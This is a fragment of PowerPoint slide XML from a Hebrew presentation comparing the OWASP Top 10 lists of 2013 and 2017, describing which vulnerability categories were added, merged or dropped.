                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ביקשנו מהקהילה לספק תובנות על שתי קטגוריות של חולשות צפויות. אחרי יותר מ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 500 הצעות, וסינון הצעות שהכילו בעיות שכבר נתמכו ע"י נתונים (כמו חשיפת מידע רגיש ו </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>), שתי הבעיות החדשות הן:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:20127</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> - פתיחה לא מאובטחת של רצף סדרתי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, חולשה המאפשרת הרצת קוד מרוחק או פעולות על מידע רגיש ברכיבים הנגועים</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> - תיעוד וניטור בלתי מספקים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, מחסור בהם עשוי למנוע או להאט משמעותית זיהוי של פעילות זדונית וחדירה, מענה לאירועי אבטחת מידע וחקירה אלקטרונית (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Digital forensics</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אוחדו או הוסרו, אבל לא נשכחו: </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - אזכור ישיר לרכיב לא מאובטח</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - חוסר בבקרת גישה ברמה היישומית </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אוחדו לתוך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> – בקרת גישה שבורה</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, בגלל שכיום ספריות רבות כוללות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>הגנות מפני מתקפות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, חולשה זו נמצאה רק ב</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5%  מהיישומים</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - הפניות והעברות לא מאומתות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, למרות שהחולשה נמצאת ב</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>8% מהיישומים בקירוב, הוחלט כי חולשת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> משמעותית יותר</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="73" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160519639"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5337085"/>
          <a:ext cx="6858000" cy="3802380"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{17292A2E-F333-43FB-9621-5CBBE7FDCDCB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3247102">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="334298">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3276600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="332204">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2013</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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rgbClr val="4E854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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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chemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 2017</a:t>
                      </a:r>
